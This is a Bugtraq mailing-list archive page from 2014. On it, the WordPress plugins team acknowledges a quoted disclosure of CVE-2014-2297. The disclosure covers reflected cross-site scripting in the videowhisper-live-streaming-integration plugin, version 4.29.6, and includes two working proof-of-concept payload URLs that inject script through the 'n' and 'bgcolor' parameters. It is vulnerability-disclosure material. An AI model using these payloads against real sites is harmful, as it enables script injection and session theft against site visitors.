lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 8 Apr 2014 21:52:35 +0000
From: "Ipstenu \(Mika Epstein\)" <plugins@...dpress.org>
To: peng.deng@...ppsecurity.com.cn
Cc: bugtraq <bugtraq@...urityfocus.com>
Subject: Re: CVE-2014-2297(WordPress-videowhisper-live-streaming-integration 4.29.6-Xss)


Thank you for reporting this plugin. We're looking into it right now.

If you wish to help us speed up the process, please remember to include a clear and concise description of the issue. In the case of any security exploits, it greatly helps if you can provide us with how you verified this is an exploit (links to the plugin listing on sites like Secuina are perfect).

If you provided a link to your report, DO NOT delete it! We have passed it on directly to the developers of the plugin.

Please note: You may not receive further communication from us on this matter, simply due to the volume of emails we get a day. We do greatly appreciate the report.

> Hi All,
> 
> CVE-2014-2297(WordPress-videowhisper-live-streaming-integration
> 4.29.6-Xss), as follows:
> 
>   
> 
>     [»] Language:           [php ]
> 
> 
> 
>     [»] Version:            [ version4.29.6 ] 
> [»] Team:
> Vty###########################################################################
> 
>  
> 
> ===[ Exploit ]==
>  
> 
>    
> [»] Exploit-1:videowhisper-live-streaming-integration/ls/htmlchat.php File
> before using the variable n is not initialized, resulting in cross-site
> scripting vulnerabilities, the specific code in line 34 of the
> file(Code:<title><?=$n?> Text Chat</title>):
> http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=</title><script>alert(1)</script>
> [»] Exploit-2:videowhisper-live-streaming-integration/ls/index.php Bgcolor
> file using variables not previously initialized, resulting in cross-site
> scripting vulnerabilities, the specific code in the sixth line of the
> file(Code:<body bgcolor="<?=$bgcolor?>">):
> http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-integration/ls/index.php?bgcolor="><script>alert(1)</script>//



-- 
Ipstenu (Mika Epstein)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ